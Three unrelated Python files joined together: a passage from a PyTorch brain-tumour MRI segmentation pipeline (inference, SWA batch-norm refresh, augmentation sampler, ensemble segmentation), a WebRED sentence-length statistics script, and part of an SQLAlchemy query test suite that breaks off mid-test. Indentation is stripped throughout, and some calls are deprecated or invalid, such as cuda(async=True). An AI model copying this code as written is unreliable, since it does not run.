last_slice = last_slice + extra_upper_slices
images_t1, masks, nonzero_masks = get_stack_no_augment(axis = axis,
volume = volume_1,
gt_volume = gt_volume,
first_slice=first_slice,
last_slice=last_slice,
size=size)
images_t1ce, masks, nonzero_masks = get_stack_no_augment(axis = axis,
volume = volume_3,
gt_volume = gt_volume,
first_slice=first_slice,
last_slice=last_slice,
size=size)
images_t2, masks, nonzero_masks = get_stack_no_augment(axis = axis,
volume = volume_2,
gt_volume = gt_volume,
first_slice=first_slice,
last_slice=last_slice,
size=size)
images_flair, masks, nonzero_masks = get_stack_no_augment(axis = axis,
volume = volume_0,
gt_volume = gt_volume,
first_slice=first_slice,
last_slice=last_slice,
size=size)
images = np.stack([images_flair, images_t1, images_t2, images_t1ce])
masks = numpy.stack([numpy.isin(masks[2:-(2+extra_upper_slices)],labelset) for labelset in target_label_sets], axis =1)
masks = masks.astype(np.float)
bg = numpy.logical_not(numpy.isin(masks, [y for x in target_label_sets for y in x]))
nonzero_masks = nonzero_masks[2:-(2+extra_upper_slices)]
return images.astype(np.float32), masks.astype(np.float32), bg.astype(np.float32), nonzero_masks.astype(np.float32)
# Override to give PyTorch size of dataset
def __len__(self):
return self.length
test_generator = DataLoader(BrainDataTest(), sampler = SequentialSampler(BrainDataTest()),
num_workers=0,pin_memory=True)
for images, masks, bg, nonzero_masks in test_generator:
images = Variable(images, volatile=True).cuda()
masks = Variable(masks, volatile=True).cuda()[0]
bg = Variable(bg, volatile=True).cuda()[0]
nonzero_mask = Variable(nonzero_masks, volatile =True).cuda()
mask_total.append(masks.data.cpu().numpy())
image_total.append(images.data.cpu().numpy()[0,0,2:-2])
outputs, logit_flip = model(images)
outputs = outputs * torch.unsqueeze(nonzero_mask[0],1)
logit_flip = logit_flip * torch.unsqueeze(nonzero_mask[0],1)
flip_prob = F.sigmoid(logit_flip)
for idx, x in enumerate(target_label_sets):
if variance_estimator == 'analytic':
loss = heteroscedastic_loss(masks[0,idx],
outputs[:,idx],
logit_flip[:,idx],
nonzero_mask,
2).mean()
else:
loss = (BCE_from_logits_focal(2)(outputs[:,idx], masks[:,idx])*nonzero_mask).mean()
loss_total[idx] = loss_total[idx]+loss.data.cpu().numpy()[0]
mask_cpu = masks.data.cpu().numpy()
outputs_cpu = outputs.cpu().data.numpy()
TP_batch = np.sum(np.logical_and(outputs_cpu>0, mask_cpu>0), axis = (0,2,3))
FP_batch = np.sum(np.logical_and(outputs_cpu>0, mask_cpu<=0), axis = (0,2,3))
TN_batch = np.sum(np.logical_and(outputs_cpu<0, mask_cpu<=0), axis = (0,2,3))
FN_batch = np.sum(np.logical_and(outputs_cpu<0, mask_cpu>0), axis = (0,2,3))
TP = TP + TP_batch
FP = FP + FP_batch
TN = TN + TN_batch
FN = FN + FN_batch
background = torch.zeros_like(outputs[:,0:1])
softmax_outputs = F.log_softmax(torch.cat([background, outputs],dim=1), dim = 1)
softmax_masks = torch.cat([bg,masks], dim = 1)
_, softmax_masks = torch.max(softmax_masks, 1)
this_softmax_loss = (nn.NLLLoss2d(reduce=False)(softmax_outputs, softmax_masks)*nonzero_mask).mean()
softmax_loss = softmax_loss + this_softmax_loss.data.cpu().numpy()[0]
logit_total.append(outputs.cpu().data.numpy())
flip_total.append(logit_flip.cpu().data.numpy())
#loss_total = loss_total + loss.data.cpu().numpy()[0]
#dice_loss = 1 - torch.mean(torch_dice(outputs_prob.data, masks.data.float()))
#loss = loss + dice_weight*dice_loss
#dice_loss = torch.mean(torch_dice(outputs.data, masks.data.float()))
#local_dice_loss = torch.mean(torch_dice_local(outputs, masks.float(), 7))
#vloss = vloss +logvar.mean()/2 #+(1-local_dice_loss)
#loss = loss + 0.00001*(net.logvar.weight**2).sum()
#val_dice.update(dice_metric, images.size(0))
#val_loss.update(vloss.data[0], images.size(0))
full_image = np.concatenate(image_total)
full_mask = np.concatenate(mask_total)
full_logit = np.concatenate(logit_total)
full_flip = np.concatenate(flip_total)
loss_total = [x / num_batches for x in loss_total]
softmax_loss = softmax_loss/num_batches
print(full_mask.shape)
new_shape = full_image.shape
shape_difference = (full_image.shape[0] - np.swapaxes(volume_0,0, axis).shape[0],
full_image.shape[1]-np.swapaxes(volume_0,0, axis).shape[1],
full_image.shape[2]-np.swapaxes(volume_0,0, axis).shape[2])
print(shape_difference)
full_image = full_image[shape_difference[0]//2:new_shape[0]- (shape_difference[0] - shape_difference[0]//2),
shape_difference[1]//2: new_shape[1]- (shape_difference[1] - shape_difference[1]//2),
shape_difference[2]//2: new_shape[2]- (shape_difference[2] - shape_difference[2]//2)]
full_image = np.swapaxes(full_image, 0, axis)
full_mask = full_mask[:,shape_difference[0]//2:new_shape[0]- (shape_difference[0] - shape_difference[0]//2),
shape_difference[1]//2: new_shape[1]- (shape_difference[1] - shape_difference[1]//2),
shape_difference[2]//2: new_shape[2]- (shape_difference[2] - shape_difference[2]//2)]
full_mask = np.swapaxes(full_mask, 1, 0)
full_mask = np.swapaxes(full_mask, 1, axis+1)
full_logit = full_logit[:, shape_difference[0]//2:new_shape[0]- (shape_difference[0] - shape_difference[0]//2),
shape_difference[1]//2: new_shape[1]- (shape_difference[1] - shape_difference[1]//2),
shape_difference[2]//2: new_shape[2]- (shape_difference[2] - shape_difference[2]//2)]
full_logit = np.swapaxes(full_logit, 1, 0)
full_logit = np.swapaxes(full_logit, 1, axis+1)
full_flip = full_flip[:, shape_difference[0]//2:new_shape[0]- (shape_difference[0] - shape_difference[0]//2),
shape_difference[1]//2: new_shape[1]- (shape_difference[1] - shape_difference[1]//2),
shape_difference[2]//2: new_shape[2]- (shape_difference[2] - shape_difference[2]//2)]
full_flip = np.swapaxes(full_flip, 1, 0)
full_flip = np.swapaxes(full_flip, 1, axis+1)
return full_image, full_mask, full_logit, full_flip, loss_total, softmax_loss, TP, FP, TN, FN
def collect_bn_modules(module, bn_modules):
if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
bn_modules.append(module)
def fix_batchnorm(data_sample, swa_model):
"""
During training, batch norm layers keep track of a running mean and
variance of the previous layer's activations. Because the parameters
of the SWA model are computed as the average of other models' parameters,
the SWA model never sees the training data itself, and therefore has no
opportunity to compute the correct batch norm statistics. Before performing
inference with the SWA model, we perform a single pass over the training data
to calculate an accurate running mean and variance for each batch norm layer.
"""
bn_modules = []
swa_model.apply(lambda module: collect_bn_modules(module, bn_modules))
if not bn_modules: return
swa_model.train()
for module in bn_modules:
module.running_mean = torch.zeros_like(module.running_mean)
module.running_var = torch.ones_like(module.running_var)
momenta = [m.momentum for m in bn_modules]
inputs_seen = 0
bn_loader = make_sampler(data_sample, label_must_be_present=17, fraction=0.9, num_samples=1000)
for data in tqdm(bn_loader, leave=False):
images, masks, bg, nonzero_masks = data
images = Variable(images).cuda(async=True)
batch_size = images.size(0)
momentum = batch_size / (inputs_seen + batch_size)
for module in bn_modules:
module.momentum = momentum
res = swa_model(images)
inputs_seen += batch_size
for module, momentum in zip(bn_modules, momenta):
module.momentum = momentum
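# Hypothetical usage sketch (the SWA weight averaging itself happens outside this file;
# `train_cases` and the checkpoint name below are placeholders, not values from the
# original training run):
#
#     swa_net = UNET_3D_to_2D(depth=4, channels_in=4, output_channels=5, slices=5).cuda()
#     load_checkpoint(swa_net, 'swa_checkpoint.pth.tar')
#     fix_batchnorm(train_cases, swa_net)   # one pass over training data to refresh BN stats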
class BrainData(Dataset):
def __init__(self, datapoints,axes = [0,1,2] ):
self.axes = axes
self.length = len(t1_filepaths)
self.datapoints = datapoints
# Override to give PyTorch access to any image on the dataset
def __getitem__(self, index, stack_depth = 5, size = (192,192)):
index, image_idx, gt_id, random_flip, rotate_axis, rotate_angle, shift, scale = index
case, axis, random_slice = self.datapoints[index]
images_t1, gt, nonzero = get_stack(axis=axis, volume=t1_data[case][image_idx],
gt_volume = gt_data[case][gt_id], central_slice=random_slice, stack_depth=stack_depth, size = size,
rotate_angle = rotate_angle, rotate_axis = rotate_axis, flipLR = random_flip,
lower_threshold = 0, upper_threshold = t1_99_percent[case][image_idx]
)
images_t2, gt, nonzero = get_stack(axis=axis, volume=t2_data[case][image_idx],
gt_volume = gt_data[case][gt_id], central_slice=random_slice, stack_depth=stack_depth, size = size,
rotate_angle = rotate_angle, rotate_axis = rotate_axis, flipLR = random_flip,
lower_threshold = 0, upper_threshold = t2_99_percent[case][image_idx]
)
images_flair, gt, nonzero = get_stack(axis=axis, volume=flair_data[case][image_idx],
gt_volume = gt_data[case][gt_id], central_slice=random_slice, stack_depth=stack_depth, size = size,
rotate_angle = rotate_angle, rotate_axis = rotate_axis, flipLR = random_flip,
lower_threshold = 0, upper_threshold = flair_99_percent[case][image_idx]
)
images_t1ce, gt, nonzero = get_stack(axis=axis, volume=t1ce_data[case][image_idx],
gt_volume = gt_data[case][gt_id], central_slice=random_slice, stack_depth=stack_depth, size = size,
rotate_angle = rotate_angle, rotate_axis = rotate_axis, flipLR = random_flip,
lower_threshold = 0, upper_threshold = t1ce_99_percent[case][image_idx]
)
images_flair = (images_flair*scale[0])+shift[0]
images_t1 = (images_t1*scale[1])+shift[1]
images_t2 = (images_t2*scale[2])+shift[2]
images_t1ce = (images_t1ce*scale[3])+shift[3]
images = np.stack([images_flair, images_t1, images_t2, images_t1ce]).astype(np.float32)
masks = numpy.stack([numpy.isin(gt[2],labelset) for labelset in target_label_sets], axis =0).astype(np.float32)
bg = numpy.logical_not(numpy.isin(gt[2], [y for x in target_label_sets for y in x]))[np.newaxis].astype(np.float32)
nonzero_masks = nonzero[2].astype(np.float32)
return images, masks, bg, nonzero_masks
# Override to give PyTorch size of dataset
def __len__(self):
return self.length
class AugmentationSampler(object):
"""Wraps a sampler to yield a mini-batch of multiple indices with data augmentation parameters
Args:
sampler (Sampler): Base sampler.
batch_size (int): Size of mini-batch.
drop_last (bool): If ``True``, the sampler will drop the last batch if
its size would be less than ``batch_size``
Example:
>>> list(BatchSampler(range(10), batch_size=3, drop_last=False))
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
>>> list(BatchSampler(range(10), batch_size=3, drop_last=True))
[[0, 1, 2], [3, 4, 5], [6, 7, 8]]
"""
def __init__(self, sampler, batch_size, iterations, drop_last=False):
if not isinstance(sampler, Sampler):
raise ValueError("sampler should be an instance of "
"torch.utils.data.Sampler, but got sampler={}"
.format(sampler))
if not isinstance(batch_size, _int_classes) or isinstance(batch_size, bool) or batch_size <= 0:
raise ValueError("batch_size should be a positive integeral value, "
"but got batch_size={}".format(batch_size))
if not isinstance(drop_last, bool):
raise ValueError("drop_last should be a boolean value, but got "
"drop_last={}".format(drop_last))
self.sampler = sampler
self.batch_size = batch_size
self.drop_last = drop_last
self.iterations = iterations
def __iter__(self):
batch = []
for y in range(self.iterations):
for idx in self.sampler:
random_masking = np.random.randint(2)
random_gt = np.random.choice([0, 3,4])
random_flip = np.random.choice([False, True])
rotate_axis = np.random.choice([0,1,2,None],p=[0.3,0.3,0.3,0.1])
shift = np.random.normal(0,0.5, 4)
scale = np.random.normal(1,0.2, 4)
if rotate_axis is not None:
rotate_angle = np.random.uniform(-15,15)
else:
rotate_angle = None
batch.append((idx, random_masking, random_gt, random_flip, rotate_axis, rotate_angle, shift, scale))
if len(batch) == self.batch_size:
yield batch
batch = []
if len(batch) > 0 and not self.drop_last:
yield batch
batch = []
def __len__(self):
if self.drop_last:
return (len(self.sampler) // self.batch_size)*self.iterations
else:
return ((len(self.sampler) + self.batch_size - 1) // self.batch_size)*self.iterations
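# A minimal sketch of how the sampler is consumed: every element of a yielded batch is a
# tuple (idx, random_masking, random_gt, random_flip, rotate_axis, rotate_angle, shift,
# scale) that BrainData.__getitem__ above unpacks into one augmented training example.
def _demo_augmentation_sampler():
    base = RandomSampler(range(10))
    for batch in AugmentationSampler(base, batch_size=3, iterations=1):
        print(batch[0])
        break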
def make_sampler(data_sample, label_must_be_present=2, fraction=0.9, num_samples=None):
datapoints = [[list(itertools.product([case],
[axis],
np.where(gt_nonempty_any[label_must_be_present][case][axis])[0])) for axis in [0,1,2]] for case in data_sample]
datapoints = [x for y in datapoints for x in y]
datapoints = [x for y in datapoints for x in y]
weights = [1-fraction]*len(datapoints)
datapoints_label = [[list(itertools.product([case],
[axis],
np.where(gt_nonempty_any[label_must_be_present][case][axis])[0])) for axis in [0,1,2]] for case in data_sample]
datapoints_label = [x for y in datapoints_label for x in y]
datapoints_label = [x for y in datapoints_label for x in y]
for idx, x in enumerate(datapoints):
if x in datapoints_label:
weights[idx]=fraction
if num_samples is None:
num_samples = len(datapoints_label)
subsample_loader = DataLoader(BrainData(datapoints), batch_sampler = AugmentationSampler(WeightedRandomSampler(weights, num_samples), batch_size=2, iterations = 1, drop_last=False),
num_workers=8,pin_memory=True)
return subsample_loader
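# make_sampler relies on globals defined in the notebook this file was extracted from
# (gt_nonempty_any and the per-case volume dicts); a typical call, mirroring the one in
# fix_batchnorm above, is make_sampler(train_cases, label_must_be_present=17,
# fraction=0.9, num_samples=1000).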
# In[16]:
def load_checkpoint(net, checkpoint_file):
if os.path.isfile(checkpoint_file):
print("=> loading checkpoint '{}'".format(checkpoint_file))
checkpoint = torch.load(checkpoint_file)
net.load_state_dict(checkpoint['state_dict'])
def segment(flair, t1, t2, t1c, net1, net2):
assert(isinstance(flair, nib.nifti1.Nifti1Image))
flair_imgs = []
t2_imgs = []
t1ce_imgs = []
t1_imgs = []
flair_imgs.append(flair)
t2_imgs.append(t2)
t1_imgs.append(t1)
t1ce_imgs.append(t1c)
flair_data = [x.get_data().astype(np.float32) for x in flair_imgs]
t1_data = [x.get_data().astype(np.float32) for x in t1_imgs]
t2_data = [x.get_data() for x in t2_imgs]
t1ce_data = [x.get_data() for x in t1ce_imgs]
case=0
case_data = [flair_data[case],t1_data[case],t2_data[case],t1ce_data[case]]
mask = (t2_data[case]>0).astype(np.int)
full_image_0, full_mask_0, full_logit_0, full_flip_0, losses_0, vloss_0,TP_0,FP_0,TN_0,FN_0 = apply_to_case(net1,
case_data,
mask,5, axis=0)
print(".")
full_image_1, full_mask_1, full_logit_1, full_flip_1, losses_1, vloss_0,TP_1,FP_1,TN_1,FN_1 = apply_to_case(net1,
case_data,
mask,5, axis=1)
print(".")
full_image_2, full_mask_2, full_logit_2, full_flip_2, losses_2, vloss_0,TP_2,FP_2,TN_2,FN_2 = apply_to_case(net1,
case_data,
mask,5, axis=2)
print(".")
full_image_0, full_mask_0, full_logit_3, full_flip_3, losses_0, vloss_0,TP_0,FP_0,TN_0,FN_0 = apply_to_case(net2,
case_data,
mask,5, axis=0)
print(".")
full_image_1, full_mask_1, full_logit_4, full_flip_4, losses_1, vloss_0,TP_1,FP_1,TN_1,FN_1 = apply_to_case(net2,
case_data,
mask,5, axis=1)
print(".")
full_image_2, full_mask_2, full_logit_5, full_flip_5, losses_2, vloss_0,TP_2,FP_2,TN_2,FN_2 = apply_to_case(net2,
case_data,
mask,5, axis=2)
print(".")
full_var_0 = np.abs(full_logit_0/full_flip_0)
full_var_1 = np.abs(full_logit_1/full_flip_1)
full_var_2 = np.abs(full_logit_2/full_flip_2)
full_var_3 = np.abs(full_logit_3/full_flip_3)
full_var_4 = np.abs(full_logit_4/full_flip_4)
full_var_5 = np.abs(full_logit_5/full_flip_5)
full_var_denom = 1/(1/full_var_0 + 1/full_var_1 + 1/full_var_2 + 1/full_var_3 + 1/full_var_4 + 1/full_var_5)
full_var = full_var_denom
weighted_logit = (full_logit_0/full_var_0 + full_logit_1/full_var_1 + full_logit_2/full_var_2 +
full_logit_3/full_var_3 + full_logit_4/full_var_4 + full_logit_5/full_var_5)*full_var_denom
full_logit = (full_logit_0 + full_logit_1 + full_logit_2+full_logit_3 + full_logit_4 + full_logit_5)/6
seg_var_ensemble = numpy.any(numpy.stack([weighted_logit[4]>0, weighted_logit[3]>0, weighted_logit[2]>0,weighted_logit[1]>0, full_logit[0]>0]), axis = 0)
seg_var_ensemble = seg_var_ensemble*5
edema = numpy.any(numpy.stack([weighted_logit[3]>0, weighted_logit[2]>0,weighted_logit[1]>0, weighted_logit[0]>0]), axis = 0)
seg_var_ensemble[edema] = 2
core = numpy.any(numpy.stack([weighted_logit[2]>0,weighted_logit[1]>0, weighted_logit[0]>0]), axis = 0)
seg_var_ensemble[core] = 1
enhancing = np.logical_and(weighted_logit[1]>weighted_logit[0], core)
seg_var_ensemble[enhancing] = 4
flair_masked = flair_data[case]*(seg_var_ensemble>0).astype(np.int)
t1_masked = t1_data[case]*(seg_var_ensemble>0).astype(np.int)
t2_masked = t2_data[case]*(seg_var_ensemble>0).astype(np.int)
t1ce_masked = t1ce_data[case]*(seg_var_ensemble>0).astype(np.int)
case_data = [flair_masked,t1_masked,t2_masked,t1ce_masked]
mask = (t2_masked>0).astype(np.int)
full_image_0, full_mask_0, full_logit_6, full_flip_6, losses_0, vloss_0,TP_0,FP_0,TN_0,FN_0 = apply_to_case(net1,
case_data,
mask,5, axis=0)
print(".")
full_image_1, full_mask_1, full_logit_7, full_flip_7, losses_1, vloss_0,TP_1,FP_1,TN_1,FN_1 = apply_to_case(net1,
case_data,
mask,5, axis=1)
print(".")
full_image_2, full_mask_2, full_logit_8, full_flip_8, losses_2, vloss_0,TP_2,FP_2,TN_2,FN_2 = apply_to_case(net1,
case_data,
mask,5, axis=2)
print(".")
full_image_0, full_mask_0, full_logit_9, full_flip_9, losses_0, vloss_0,TP_0,FP_0,TN_0,FN_0 = apply_to_case(net2,
case_data,
mask,5, axis=0)
print(".")
full_image_1, full_mask_1, full_logit_10, full_flip_10, losses_1, vloss_0,TP_1,FP_1,TN_1,FN_1 = apply_to_case(net2,
case_data,
mask,5, axis=1)
print(".")
full_image_2, full_mask_2, full_logit_11, full_flip_11, losses_2, vloss_0,TP_2,FP_2,TN_2,FN_2 = apply_to_case(net2,
case_data,
mask,5, axis=2)
print(".")
full_var_6 = np.abs(full_logit_6/full_flip_6)
full_var_7 = np.abs(full_logit_7/full_flip_7)
full_var_8 = np.abs(full_logit_8/full_flip_8)
full_var_9 = np.abs(full_logit_9/full_flip_9)
full_var_10 = np.abs(full_logit_10/full_flip_10)
full_var_11 = np.abs(full_logit_11/full_flip_11)
full_var_denom = 1/(1/full_var_0 + 1/full_var_1 + 1/full_var_2 + 1/full_var_3 + 1/full_var_4 + 1/full_var_5+
1/full_var_6 + 1/full_var_7 + 1/full_var_8 + 1/full_var_9 + 1/full_var_10 + 1/full_var_11)
full_var = full_var_denom
weighted_logit = (full_logit_0/full_var_0 + full_logit_1/full_var_1 + full_logit_2/full_var_2 +
full_logit_3/full_var_3 + full_logit_4/full_var_4 + full_logit_5/full_var_5 +
full_logit_6/full_var_6 + full_logit_7/full_var_7 + full_logit_8/full_var_8 +
full_logit_9/full_var_9 + full_logit_10/full_var_10 + full_logit_11/full_var_11)*full_var_denom
full_logit = (full_logit_0 + full_logit_1 + full_logit_2+full_logit_3 + full_logit_4 + full_logit_5+
full_logit_6 + full_logit_7 + full_logit_8+full_logit_9 + full_logit_10 + full_logit_11)/12
seg_var_ensemble = numpy.any(numpy.stack([weighted_logit[4]>0, weighted_logit[3]>0, weighted_logit[2]>0,weighted_logit[1]>0, full_logit[0]>0]), axis = 0)
seg_var_ensemble = seg_var_ensemble*5
edema = numpy.any(numpy.stack([weighted_logit[3]>0, weighted_logit[2]>0,weighted_logit[1]>0, weighted_logit[0]>0]), axis = 0)
seg_var_ensemble[edema] = 2
core = numpy.any(numpy.stack([weighted_logit[2]>0,weighted_logit[1]>0, weighted_logit[0]>0]), axis = 0)
seg_var_ensemble[core] = 1
enhancing = np.logical_and(weighted_logit[1]>weighted_logit[0], core)
seg_var_ensemble[enhancing] = 4
brain_mask = (seg_var_ensemble>0).astype(np.int32)
seg_var_ensemble[seg_var_ensemble == 5] = 0
enhancing_vol = np.sum(seg_var_ensemble==4)
core_vol = np.sum(np.logical_or(seg_var_ensemble == 1, seg_var_ensemble == 4))
edema_vol = np.sum(seg_var_ensemble>0)
# In[225]:
if core_vol == 0:
edema = seg_var_ensemble >0
seg_var_ensemble[edema] = 1
from scipy import ndimage as ndi
label_objects, nb_labels = ndi.label(seg_var_ensemble>0)
if nb_labels > 1:
for n in range(nb_labels):
if np.sum(label_objects ==n+1) < 400:
seg_var_ensemble[label_objects == n+1] = 0
if edema_vol == 0:
seg_var_ensemble = (brain_mask * 2).astype(np.int32)
return seg_var_ensemble
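# Hypothetical end-to-end sketch (file names, checkpoint names, and the depth argument
# are made up; both nets are instances of the U-Net defined above with weights trained
# elsewhere):
#
#     flair = nib.load('case_flair.nii.gz'); t1 = nib.load('case_t1.nii.gz')
#     t2 = nib.load('case_t2.nii.gz');       t1c = nib.load('case_t1ce.nii.gz')
#     net1 = UNET_3D_to_2D(depth=4, channels_in=4, output_channels=5, slices=5).cuda()
#     net2 = UNET_3D_to_2D(depth=4, channels_in=4, output_channels=5, slices=5).cuda()
#     load_checkpoint(net1, 'net1.pth.tar'); load_checkpoint(net2, 'net2.pth.tar')
#     label_volume = segment(flair, t1, t2, t1c, net1, net2)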
|
"""
Author: Tong
Time: --2021
"""
import json
import numpy as np
with open("data/webred/webred_21.json", "r") as file_in:
original_data = json.load(file_in)
# process data into <x, y>
_pair_data = []
for item in original_data:
_pair_data.append([item['sentence'], item['relation_name']])
pass
len_ = []
for i, sent in enumerate(_pair_data):
len_.append(len(sent[0].split()))
len_ = np.array(len_)
length = len(len_)
print(np.max(len_))
print(np.size(len_))
print("200: ", float(len(np.where(len_>200)[0]) / length))
print("100: ", float(len(np.where(len_>100)[0]) / length))
print("80: ", float(len(np.where(len_>80)[0]) / length))
print("70: ", float(len(np.where(len_>70)[0]) / length))
print("60: ", float(len(np.where(len_>60)[0]) / length))
print("50: ", float(len(np.where(len_>50)[0]) / length))
|
from sqlalchemy.testing import eq_, assert_raises_message, assert_raises, \
is_, in_, not_in_
from sqlalchemy import testing
from sqlalchemy.testing import fixtures, engines
from sqlalchemy import util
from sqlalchemy import (
exc, sql, func, select, String, Integer, MetaData, and_, ForeignKey,
union, intersect, except_, union_all, VARCHAR, INT, CHAR, text, Sequence,
bindparam, literal, not_, type_coerce, literal_column, desc, asc,
TypeDecorator, or_, cast, table, column)
from sqlalchemy.engine import default, result as _result
from sqlalchemy.testing.schema import Table, Column
# ongoing - these are old tests. Those which are of general use
# to test a dialect are being slowly migrated to
# sqlalchemy.testing.suite
users = users2 = addresses = metadata = None
class QueryTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global users, users2, addresses, metadata
metadata = MetaData(testing.db)
users = Table(
'query_users', metadata,
Column(
'user_id', INT, primary_key=True,
test_needs_autoincrement=True),
Column('user_name', VARCHAR(20)),
test_needs_acid=True
)
addresses = Table(
'query_addresses', metadata,
Column(
'address_id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('user_id', Integer, ForeignKey('query_users.user_id')),
Column('address', String(30)),
test_needs_acid=True
)
users2 = Table(
'u2', metadata,
Column('user_id', INT, primary_key=True),
Column('user_name', VARCHAR(20)),
test_needs_acid=True
)
metadata.create_all()
@engines.close_first
def teardown(self):
addresses.delete().execute()
users.delete().execute()
users2.delete().execute()
@classmethod
def teardown_class(cls):
metadata.drop_all()
@testing.requires.multivalues_inserts
def test_multivalues_insert(self):
users.insert(
values=[
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'}]).execute()
rows = users.select().order_by(users.c.user_id).execute().fetchall()
self.assert_(rows[0] == (7, 'jack'))
self.assert_(rows[1] == (8, 'ed'))
users.insert(values=[(9, 'jack'), (10, 'ed')]).execute()
rows = users.select().order_by(users.c.user_id).execute().fetchall()
self.assert_(rows[2] == (9, 'jack'))
self.assert_(rows[3] == (10, 'ed'))
def test_insert_heterogeneous_params(self):
"""test that executemany parameters are asserted to match the
parameter set of the first."""
assert_raises_message(
exc.StatementError,
r"\(sqlalchemy.exc.InvalidRequestError\) A value is required for "
"bind parameter 'user_name', in "
"parameter group 2 "
r"\[SQL: u?'INSERT INTO query_users",
users.insert().execute,
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9}
)
# this succeeds however. We aren't yet doing
# a length check on all subsequent parameters.
users.insert().execute(
{'user_id': 7},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9}
)
def test_lastrow_accessor(self):
"""Tests the inserted_primary_key and lastrow_has_id() functions."""
def insert_values(engine, table, values):
"""
Inserts a row into a table, returns the full list of values
INSERTed including defaults that fired off on the DB side and
detects rows that had defaults and post-fetches.
"""
# verify implicit_returning is working
if engine.dialect.implicit_returning:
ins = table.insert()
comp = ins.compile(engine, column_keys=list(values))
if not set(values).issuperset(
c.key for c in table.primary_key):
assert comp.returning
result = engine.execute(table.insert(), **values)
ret = values.copy()
for col, id in zip(table.primary_key, result.inserted_primary_key):
ret[col.key] = id
if result.lastrow_has_defaults():
criterion = and_(
*[
col == id for col, id in
zip(table.primary_key, result.inserted_primary_key)])
row = engine.execute(table.select(criterion)).first()
for c in table.c:
ret[c.key] = row[c]
return ret
if testing.against('firebird', 'postgresql', 'oracle', 'mssql'):
assert testing.db.dialect.implicit_returning
if testing.db.dialect.implicit_returning:
test_engines = [
engines.testing_engine(options={'implicit_returning': False}),
engines.testing_engine(options={'implicit_returning': True}),
]
else:
test_engines = [testing.db]
for engine in test_engines:
metadata = MetaData()
for supported, table, values, assertvalues in [
(
{'unsupported': ['sqlite']},
Table(
"t1", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('foo', String(30), primary_key=True)),
{'foo': 'hi'},
{'id': 1, 'foo': 'hi'}
),
(
{'unsupported': ['sqlite']},
Table(
"t2", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('foo', String(30), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'foo': 'hi'},
{'id': 1, 'foo': 'hi', 'bar': 'hi'}
),
(
{'unsupported': []},
Table(
"t3", metadata,
Column("id", String(40), primary_key=True),
Column('foo', String(30), primary_key=True),
Column("bar", String(30))
),
{'id': 'hi', 'foo': 'thisisfoo', 'bar': "thisisbar"},
{'id': 'hi', 'foo': 'thisisfoo', 'bar': "thisisbar"}
),
(
{'unsupported': []},
Table(
"t4", metadata,
Column(
'id', Integer,
Sequence('t4_id_seq', optional=True),
primary_key=True),
Column('foo', String(30), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'foo': 'hi', 'id': 1},
{'id': 1, 'foo': 'hi', 'bar': 'hi'}
),
(
{'unsupported': []},
Table(
"t5", metadata,
Column('id', String(10), primary_key=True),
Column('bar', String(30), server_default='hi')
),
{'id': 'id1'},
{'id': 'id1', 'bar': 'hi'},
),
(
{'unsupported': ['sqlite']},
Table(
"t6", metadata,
Column(
'id', Integer, primary_key=True,
test_needs_autoincrement=True),
Column('bar', Integer, primary_key=True)
),
{'bar': 0},
{'id': 1, 'bar': 0},
),
]:
if testing.db.name in supported['unsupported']:
continue
try:
table.create(bind=engine, checkfirst=True)
i = insert_values(engine, table, values)
assert i == assertvalues, "tablename: %s %r %r" % \
(table.name, repr(i), repr(assertvalues))
finally:
table.drop(bind=engine)
# TODO: why not in the sqlite suite?
@testing.only_on('sqlite+pysqlite')
@testing.provide_metadata
def test_lastrowid_zero(self):
from sqlalchemy.dialects import sqlite
eng = engines.testing_engine()
class ExcCtx(sqlite.base.SQLiteExecutionContext):
def get_lastrowid(self):
return 0
eng.dialect.execution_ctx_cls = ExcCtx
t = Table(
't', self.metadata, Column('x', Integer, primary_key=True),
Column('y', Integer))
t.create(eng)
r = eng.execute(t.insert().values(y=5))
eq_(r.inserted_primary_key, [0])
@testing.fails_on(
'sqlite', "sqlite autoincremnt doesn't work with composite pks")
def test_misordered_lastrow(self):
related = Table(
'related', metadata,
Column('id', Integer, primary_key=True),
mysql_engine='MyISAM'
)
t6 = Table(
"t6", metadata,
Column(
'manual_id', Integer, ForeignKey('related.id'),
primary_key=True),
Column(
'auto_id', Integer, primary_key=True,
test_needs_autoincrement=True),
mysql_engine='MyISAM'
)
metadata.create_all()
r = related.insert().values(id=12).execute()
id = r.inserted_primary_key[0]
assert id == 12
r = t6.insert().values(manual_id=id).execute()
eq_(r.inserted_primary_key, [12, 1])
def test_implicit_id_insert_select_columns(self):
stmt = users.insert().from_select(
(users.c.user_id, users.c.user_name),
users.select().where(users.c.user_id == 20))
testing.db.execute(stmt)
def test_implicit_id_insert_select_keys(self):
stmt = users.insert().from_select(
["user_id", "user_name"],
users.select().where(users.c.user_id == 20))
testing.db.execute(stmt)
def test_row_iteration(self):
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
r = users.select().execute()
l = []
for row in r:
l.append(row)
self.assert_(len(l) == 3)
@testing.requires.subqueries
def test_anonymous_rows(self):
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
sel = select([users.c.user_id]).where(users.c.user_name == 'jack'). \
as_scalar()
for row in select([sel + 1, sel + 3], bind=users.bind).execute():
assert row['anon_1'] == 8
assert row['anon_2'] == 10
@testing.fails_on(
'firebird', "kinterbasdb doesn't send full type information")
def test_order_by_label(self):
"""test that a label within an ORDER BY works on each backend.
This test should be modified to support [ticket:1068] when that ticket
is implemented. For now, you need to put the actual string in the
ORDER BY.
"""
users.insert().execute(
{'user_id': 7, 'user_name': 'jack'},
{'user_id': 8, 'user_name': 'ed'},
{'user_id': 9, 'user_name': 'fred'},
)
concat = ("test: " + users.c.user_name).label('thedata')
eq_(
select([concat]).order_by("thedata").execute().fetchall(),
[("test: ed",), ("test: fred",), ("test: jack",)]
)
eq_(
